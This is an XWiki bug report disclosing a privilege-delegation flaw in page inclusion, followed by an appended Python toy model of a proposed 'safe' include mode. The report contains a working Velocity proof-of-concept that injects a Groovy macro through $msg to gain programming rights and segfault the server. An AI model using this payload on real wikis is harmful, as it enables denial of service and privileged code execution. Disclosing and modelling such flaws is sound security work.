Details
- Bug
- Resolution: Cannot Reproduce
- Major
- None
- 2.4 M1
- Unknown
Description
Tested effective against 2.4-SNAPSHOT.29340.
This is pretty easy to exploit and we probably ought to look at changing the behavior of XWiki.include or at least adding a configuration parameter to switch between 'legacy' and 'safe'.
{{velocity}}
#if($request.getParameter('segfault'))
#if($xcontext.hasProgrammingRights())
You have PR, segfaulting the machine would be boring.
#else
#set($msg = {'xe.spaces.action.index': '{{groovy}} new Random().unsafe.putAddress(0,0); {{/groovy}}'})
#includeTopic('Main.Spaces')
#end
#end
Do I have programming rights? $xcontext.hasProgrammingRights()
{{/velocity}}
[[Segfault me>>?segfault=me]]
Issue Links
- depends on XWIKI-7879 Refactor to confine delegation of programming rights. (In Progress)
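A toy model of the delegation problem this report describes, added here as an illustration and not XWiki code: an included page authored with programming rights renders a value taken from a caller-controlled mapping. The `include` function, the meaning given to 'legacy' and 'safe' (safe = rights of the caller AND of the included page's author), and the sample page and override are assumptions.

```python
# Constructed model of include-time rights delegation; not XWiki code.
from dataclasses import dataclass, field

PRIVILEGED = "{{groovy}}"  # stands in for any macro that requires programming rights (PR)

@dataclass
class Document:
    name: str
    author_has_pr: bool   # rights of the document's last author
    message_keys: list    # translation keys the document prints via $msg

@dataclass
class Context:
    caller_has_pr: bool                            # rights of the including document's author
    variables: dict = field(default_factory=dict)  # caller-writable, like $msg

def render(value, has_pr):
    """Privileged macros in rendered output execute only when has_pr is True."""
    if PRIVILEGED in value:
        return "EXECUTED" if has_pr else "BLOCKED"
    return value

def include(ctx, doc, mode):
    """Render doc for the caller in ctx under the given (assumed) mode."""
    if mode == "legacy":
        effective_pr = doc.author_has_pr                        # caller borrows the author's PR
    elif mode == "safe":
        effective_pr = doc.author_has_pr and ctx.caller_has_pr  # intersection of both
    else:
        raise ValueError(f"unknown include mode: {mode!r}")
    # The included page resolves its keys through the caller-controlled mapping.
    return [render(ctx.variables.get(k, k), effective_pr) for k in doc.message_keys]

# Constructed sample: a PR-authored page included by a caller without PR
# who has replaced the message lookup with a string carrying a privileged macro.
SPACES = Document("Main.Spaces", author_has_pr=True, message_keys=["xe.spaces.action.index"])
OVERRIDE = {"xe.spaces.action.index": "{{groovy}} /* placeholder body */ {{/groovy}}"}

if __name__ == "__main__":
    for mode in ("legacy", "safe"):
        print(mode, include(Context(False, dict(OVERRIDE)), SPACES, mode))
```

In this model the 'safe' mode leaves a caller who already holds programming rights unaffected, so only the borrowed privilege is removed.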